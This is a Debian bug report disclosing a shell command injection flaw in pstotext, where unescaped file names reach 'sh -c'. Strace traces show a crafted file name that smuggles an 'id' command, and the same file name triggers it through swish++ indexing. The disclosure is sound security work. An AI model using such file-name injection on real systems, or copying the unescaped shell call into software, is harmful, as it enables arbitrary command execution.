Package: pstotext
Version: 1.9-1sarge1
Severity: grave
Justification: user security hole
[EMAIL PROTECTED]:/tmp/deleteme$ pstotext "a'b.ps"
sh: -c: line 1: unexpected EOF while looking for matching `''
sh: -c: line 2: syntax error: unexpected end of file
[EMAIL PROTECTED]:/tmp/deleteme$ mv "a'b.ps" ab.ps
[EMAIL PROTECTED]:/tmp/deleteme$ pstotext "ab.ps"
ESP Ghostscript 7.07.1: Unrecoverable error, exit code 1
[EMAIL PROTECTED]:/tmp/deleteme$ strace -s 256 -e trace=process -ff pstotext "a'b.ps"
execve("/usr/bin/pstotext", ["pstotext", "a\'b.ps"], [/* 35 vars */]) = 0
vfork(Process 25977 attached
) = 25977
[pid 25977] execve("/bin/sh", ["sh", "-c", "gs -r72 -dNODISPLAY -dFIXEDMEDIA -dDELAYBIND -dWRITESYSTEMDICT -q -dNOPAUSE -dSAFER /tmp/ps2tvQBxTF -- \'a\'b.ps\'"], [/* 35 vars */]) = 0
sh: -c: line 1: unexpected EOF while looking for matching `''
sh: -c: line 2: syntax error: unexpected end of file
[pid 25977] exit_group(258) = ?
Process 25977 detached
--- SIGCHLD (Child exited) @ 0 (0) ---
waitpid(25977, [{WIFEXITED(s) && WEXITSTATUS(s) == 2}], 0) = 25977
exit_group(3) = ?

You can see that I correctly quoted the parameter in the invoking shell, and pstotext passes the parameter to the nested sh as 'a'b.ps' which obviously gets it confused. This could be a security issue, if you can run pstotext with an arbitrary filename (e.g. via swish++ running on some untrusted source).
e.g.:

[EMAIL PROTECTED]:/tmp/data$ strace -s 256 -e trace=process -ff "pstotext" "hi.txt'; id>/tmp/abc.key; echo 'silly"
execve("/usr/bin/pstotext", ["pstotext", "hi.txt\'; id>/tmp/abc.key; echo \'silly"], [/* 19 vars */]) = 0
arch_prctl(ARCH_SET_FS, 0x2aaaaaf7e6d0) = 0
clone(Process 9983 attached
child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x2aaaaaf7e760) = 9983
[pid  9983] execve("/bin/sh", ["sh", "-c", "gs -r72 -dNODISPLAY -dFIXEDMEDIA -dDELAYBIND -dWRITESYSTEMDICT -q -dNOPAUSE -dSAFER /tmp/ps2tIqkOjd -- \'hi.txt\'; id>/tmp/abc.key; echo \'silly\'"], [/* 19 vars */]) = 0
[pid  9983] arch_prctl(ARCH_SET_FS, 0x2aaaab0576d0) = 0
[pid  9983] clone(Process 9984 attached
child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x2aaaab057760) = 9984
[pid  9983] wait4(-1, Process 9983 suspended
 <unfinished ...>
[pid  9984] execve("/usr/bin/gs", ["gs", "-r72", "-dNODISPLAY", "-dFIXEDMEDIA", "-dDELAYBIND", "-dWRITESYSTEMDICT", "-q", "-dNOPAUSE", "-dSAFER", "/tmp/ps2tIqkOjd", "--", "hi.txt"], [/* 18 vars */]) = 0
[pid  9984] arch_prctl(ARCH_SET_FS, 0x2aaaace67b30) = 0
ESP Ghostscript 7.07.1: Unrecoverable error, exit code 1
[pid  9984] exit_group(0) = ?
Process 9983 resumed
Process 9984 detached
[pid  9983] <... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 9984
[pid  9983] --- SIGCHLD (Child exited) @ 0 (0) ---
[pid  9983] wait4(-1, 0x7fffffb1ce14, WNOHANG, NULL) = -1 ECHILD (No child processes)
[pid  9983] clone(Process 9985 attached
child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x2aaaab057760) = 9985
[pid  9983] wait4(-1, Process 9983 suspended
 <unfinished ...>
[pid  9985] execve("/usr/bin/id", ["id"], [/* 18 vars */]) = 0
[pid  9985] arch_prctl(ARCH_SET_FS, 0x2aaaaadf96d0) = 0
[pid  9985] exit_group(0) = ?
Process 9983 resumed
Process 9985 detached
[pid  9983] <... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 9985
[pid  9983] --- SIGCHLD (Child exited) @ 0 (0) ---
[pid  9983] wait4(-1, 0x7fffffb1ce34, WNOHANG, NULL) = -1 ECHILD (No child processes)
[pid  9983] exit_group(0) = ?
Process 9983 detached
--- SIGCHLD (Child exited) @ 0 (0) ---
wait4(9983, [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 9983
exit_group(0) = ?

You can clearly see that I tricked pstotext into running id and outputting the result into a temp file.

If I do the following:

[EMAIL PROTECTED]:/tmp/data$ touch "hi.txt'; id>abc.key; echo 'silly.ps"
[EMAIL PROTECTED]:/tmp/data$ rm abc.key
[EMAIL PROTECTED]:/tmp/data$ ls -l
total 0
-rw-r--r--  1 ivt ivt 0 2006-03-15 16:50 hi.txt'; id>abc.key; echo 'silly.ps

I can trick swish++ into running an arbitrary command by passing the filename through pstotext:

[EMAIL PROTECTED]:/tmp/data$ 'index++' -v4 '--config-file' '/usr/share/sitebuilder/core/indexing.conf' '--index-file' /tmp/abcd /tmp/data
/tmp/data:
  hi.txt'; id>abc.key; echo 'silly.psESP Ghostscript 7.07.1: Unrecoverable error, exit code 1
 (skipped: can not open)
index++: done:
  00:01 (min:sec) elapsed time
  1 files, 0 indexed
  0 words, 0 indexed, 0 unique
[EMAIL PROTECTED]:/tmp/data$ ls -l
total 4
-rw-r--r--  1 ivt ivt 162 2006-03-15 16:51 abc.key
-rw-r--r--  1 ivt ivt   0 2006-03-15 16:50 hi.txt'; id>abc.key; echo 'silly.ps
[EMAIL PROTECTED]:/tmp/data$ cat abc.key
uid=1000(ivt) gid=1000(ivt) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),104(lpadmin),105(scanner),106(admin),1000(ivt)

As you can see, pstotext was tricked into running the id command and the result appeared in abc.key.
-- System Information:
Debian Release: 3.1
  APT prefers unstable
  APT policy: (50, 'unstable')
Architecture: powerpc (ppc)
Kernel: Linux 2.6.8-pegasos
Locale: LANG=en_AU.UTF-8, LC_CTYPE=en_AU.UTF-8 (charmap=UTF-8)

Versions of packages pstotext depends on:
ii  gs             8.01-5        Transitional package
ii  gs-esp [gs]    7.07.1-9      The Ghostscript PostScript interpr
ii  gs-gpl [gs]    8.01-5        The GPL Ghostscript PostScript int
ii  libc6          2.3.2.ds1-22  GNU C Library: Shared libraries an

-- no debconf information